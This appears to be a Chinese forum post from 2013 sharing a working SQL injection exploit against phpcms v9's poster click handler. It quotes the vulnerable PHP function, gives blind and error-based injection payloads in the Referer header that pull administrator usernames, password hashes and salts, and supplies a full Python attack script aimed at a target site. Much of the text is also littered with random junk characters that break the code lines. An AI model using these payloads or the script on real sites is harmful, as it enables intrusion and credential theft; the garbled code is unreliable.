有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:8 ^7 ^. j: k2 i0 }5 d5 |
: N+ m7 H+ W/ G6 K* Z1 ]/ @
问题函数\phpcms\modules\poster\index.php: C2 U/ C0 j) j' ]/ a( F
0 M* t6 K$ W$ r5 R: Spublic function poster_click() {- G4 `9 a# i, ^" P
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;2 t V# G" J( ]; t
$r = $this->db->get_one(array('id'=>$id));
1 ?; `: \9 W6 j) U4 x: d5 r4 Mif (!is_array($r) && empty($r)) return false;
+ a; K* A/ S4 }& c4 ~+ ~" y" }$ip_area = pc_base::load_sys_class('ip_area');
4 ?$ O) \: J7 ]2 w; M6 o) X9 U( N$ip = ip();& | Q2 T M- n! L( V$ n0 h
$area = $ip_area->get($ip);6 `: W% i, X+ Y7 j1 S
$username = param::get_cookie('username') ? param::get_cookie('username') : '';- I, I7 x, q' d6 h" g" k( l
if($id) {4 \8 P$ _ D+ r/ y. a7 Q
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
2 }9 \$ k* a# t/ j$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
- k" z" v! I9 y, p a" w}
1 M- I6 P y1 S) ?) \$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
/ X8 M. @& y& V$ R$setting = string2array($r['setting']);+ O4 G* o6 l9 w, X& P% b% l* t; o
if (count($setting)==1) {
/ R/ e0 j! \7 e- j/ k: Y* h$url = $setting['1']['linkurl'];9 J4 R0 f; \- j, l$ R, R: H
} else {4 [! p8 y( E0 z) p& x! B+ K6 {, n
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];+ S4 N) J5 l! t5 _) g
}
5 f( U% G2 S! \header('Location: '.$url);
3 P7 P4 G m; H; X. R$ d}
0 }" P8 S) l2 a
3 f; a9 \6 U; o* A
- U5 i* j2 `: h6 _3 o9 W# d4 f# U4 C( o: s- n+ P! n+ M% I3 p
利用方式:' N5 R1 ~9 x8 ^5 ]& v0 u* I, B
: M! ~8 x \' F9 b3 ?3 @+ A
1、可以采用盲注入的手法:
8 H6 b1 a5 E5 Q2 h' K% x! ?% [2 L, b) K, ]2 N
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
- Z; l4 r! L) O
, B- Z( ~( b" ~; B+ z9 ^! B, z; c# O通过返回页面,正常与否一个个猜解密码字段。
7 D9 t5 j* D$ A* T0 s& J8 F u; Q3 ~, t. V4 F$ B, N* ] q
2、代码是花开写的,随手附上了:, {: M$ w; s9 K$ t7 L+ U1 B
: e* A) p0 y$ w2 E1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#- W# Z4 o( f& g/ {' J9 Q7 N
/ W m b2 ?" b! o' ]. }. r此方法是爆错注入手法,原理自查。% C: n0 S0 \# Y- P' Z M# y5 L6 Q9 Y% V3 `
6 h$ z, F ^6 \' n9 w- |) i + L# t. j& X/ i
6 {" V {4 V$ b% G% _2 r9 v' \利用程序:& ]- T- O {, m* _7 L
1 i+ \( a; k( S q1 |+ B6 q#!/usr/bin/env python& b, b9 P4 e& L* d) V, X
import httplib,sys,re
9 _9 K5 Q R0 T; X- a" L) p
% w' p* _* x% x% j) N/ mdef attack():
! T4 M6 n5 n4 c- @1 K: s6 Fprint “Code by Pax.Mac Team conqu3r!”
9 Y2 _6 d& x+ k# c* qprint “Welcome to our zone!!!”. G p n: v2 ]& R" `+ m
url=sys.argv[1]* e! V0 a8 J8 P0 o
paths=sys.argv[2]
) E3 F8 R: |* B M3 }, Jconn = httplib.HTTPConnection(url)
: O6 {9 ]4 u4 |6 l* j- C. ?i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,) `7 p, r2 M' o+ j- Q* e. i+ l! t
“Accept”: “text/plain”,3 P, X- F8 r Y6 ?! Q- x( ]% F4 d
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}1 u( u+ S1 T+ I6 ?$ i1 `' c
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)5 \. u& W) t3 J
r1 = conn.getresponse()( U" }3 ^4 S$ C5 E2 p
datas=r1.read()$ Y/ M# Z' I" i
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
% l3 S, R0 x% Cprint datas[0]! o% B8 s; u; p- M
conn.close()
: x* T i+ b( R2 H+ y' gif __name__==”__main__”:
5 l, ] k# }5 P6 B8 @$ U, U2 T: O" |if len(sys.argv)<3:
- f; p# k, j4 B! | i! y( Tprint “Code by Pax.Mac Team conqu3r”
) P. N ?9 v% L5 }6 Kprint “Usgae:”
6 R8 h8 A, z2 m p8 ]! bprint “ phpcmsattack.py www.paxmac.org /”
* @9 {- B1 b" h' a) Lprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”$ n3 i- t# J# A! y0 ^5 p# i8 | ^
sys.exit(1)7 P2 g5 U2 b/ g$ q7 M& x
attack()
) G4 M$ V$ K U9 U5 b: r+ ?; { ^
0 b6 D, f5 [3 D2 l0 L6 x6 c. D |
发表于 2013-1-11 21:01:00
收藏
支持
反对